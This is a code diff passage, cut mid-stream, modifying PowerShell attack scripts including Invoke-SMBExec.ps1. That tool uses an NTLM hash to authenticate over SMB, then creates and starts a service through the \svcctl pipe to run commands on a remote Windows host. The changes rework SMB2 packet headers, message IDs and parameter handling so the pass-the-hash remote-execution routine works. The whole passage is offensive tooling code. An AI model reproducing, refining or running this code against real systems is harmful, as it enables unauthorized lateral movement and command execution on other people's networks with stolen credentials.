$process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["CreditCharge"] = 0x01,0x00 if($SMB_signing) @@ -2653,7 +2645,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeDisconnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2694,7 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'Logoff' { $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1 index 7a4d868..1a2e3b5 100644 --- a/Invoke-SMBExec.ps1 +++ b/Invoke-SMBExec.ps1 @@ -72,10 +72,10 @@ param [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username, [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, - [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][String]$Service, - [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck, + [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SigningCheck, [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh, @@ -127,6 +127,8 @@ function New-PacketSMBHeader { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -338,7 +340,7 @@ function New-PacketSMBLogoffAndXRequest } #SMB2 - +<# function New-PacketSMB2Header { param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) @@ -352,7 +354,7 @@ function New-PacketSMB2Header $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("Command",$packet_command) - $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x01,0x00)) $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) @@ -363,6 +365,31 @@ function New-PacketSMB2Header return $packet_SMB2Header } +#> +function New-PacketSMB2Header +{ + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + + [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 + + $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) + $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00)) + $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00)) + $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("Command",$packet_command) + $packet_SMB2Header.Add("CreditRequest",$packet_credit_request) + $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("MessageID",$packet_message_ID) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) + $packet_SMB2Header.Add("TreeID",$packet_tree_ID) + $packet_SMB2Header.Add("SessionID",$packet_session_ID) + $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + + return $packet_SMB2Header +} function New-PacketSMB2NegotiateProtocolRequest { @@ -870,7 +897,6 @@ if($session_string) $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -$process_ID = $process_ID -replace "-00-00","" [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if(!$session_string) @@ -1008,7 +1034,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1044,8 +1070,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1182,8 +1208,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1560,7 +1586,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW' { $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID - + if($SMB_signing) { $packet_SMB_header["Flags2"] = 0x05,0x48 @@ -2023,8 +2049,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeConnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2065,12 +2090,10 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequest' { - #$SMB2_tree_ID = 0x01,0x00,0x00,0x00 $SMB2_tree_ID = $SMB_client_receive[40..43] $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2124,8 +2147,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB_file_ID = $SMB_client_receive[132..147] $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2160,12 +2182,9 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'ReadRequest' { - Start-Sleep -m $Sleep $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 - $packet_SMB2_header["CreditCharge"] = 0x10,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2173,6 +2192,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID + $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -2216,9 +2236,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'OpenSCManagerW' { - $SMB2_message_ID += 23 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2280,7 +2299,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table else { Write-Output "$output_username is a local administrator on $Target" - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage = 2 $SMB_client_stage = 'CloseServiceHandle' } @@ -2304,9 +2323,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table if($SMBExec_command_bytes.Length -lt $SMB_split_index) { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2348,9 +2366,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2399,8 +2416,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { $SMB_split_stage++ $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2447,8 +2463,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW_Last' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2489,9 +2504,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { Write-Verbose "Service $SMB_service created on $Target" $SMB_service_context_handle = $SMB_client_receive[112..131] - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2551,9 +2565,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table Write-Output "Service $SMB_service failed to start on $Target" } - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2595,7 +2608,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table if($SMB_close_service_handle_stage -eq 1) { Write-Verbose "Service $SMB_service deleted on $Target" - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage++ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle } @@ -2606,8 +2619,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2641,9 +2653,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CloseRequest' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2675,8 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeDisconnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2716,9 +2726,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'Logoff' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2744,6 +2753,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Exit' } } |